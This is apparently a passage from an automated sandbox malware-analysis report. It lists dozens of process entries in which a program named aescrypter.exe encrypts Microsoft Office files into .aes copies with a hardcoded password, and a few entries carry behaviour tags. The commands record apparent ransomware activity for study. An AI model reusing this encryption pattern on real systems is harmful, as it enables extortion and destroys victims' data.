  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATETIME.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATETIME.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2084
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DigitalInk.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DigitalInk.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2040
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1968
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2232
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2588
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2236
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1016
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\NUMERIC.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\NUMERIC.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1712
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1992
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1092
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\SectionHeading.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\SectionHeading.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\StaticText.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\StaticText.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1528
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1976
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:344
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2456
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\UnformattedNumeric.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\UnformattedNumeric.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1944
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2416
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2532
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1644
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\GrooveFormsMetaData.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\GrooveFormsMetaData.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2688
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\ViewHeaderPreview.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\ViewHeaderPreview.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2164
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2184
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2308
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3052
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2868
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2852
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ViewHeaderPreview.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ViewHeaderPreview.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2960
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2756
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:920
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2964
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2972
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1488
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2200
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2672
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2480
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\InfoPathWelcomeImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\InfoPathWelcomeImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2872
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2376
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1676
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2808
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2908
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2948
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1480
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2028
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1728
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2788
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2916
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2840
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2676
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1760
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2272
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABMASK.BMP.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABMASK.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2288
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABOFF.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABOFF.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2404
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2152
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2992
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WhiteboxMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WhiteboxMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1920
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1240
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2472
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:980
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1052
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1140
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterApplicationDescriptors.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterApplicationDescriptors.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:744
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterNotificationDescriptors.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterNotificationDescriptors.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1724
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.InfoPath.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.InfoPath.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2912
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2188
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2496
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.InfoPath.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.InfoPath.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2456
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\IPIRM.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\IPIRM.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1944
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\IPIRMV.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\IPIRMV.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2416
- C:\ProgramData\local\aescrypter.exe
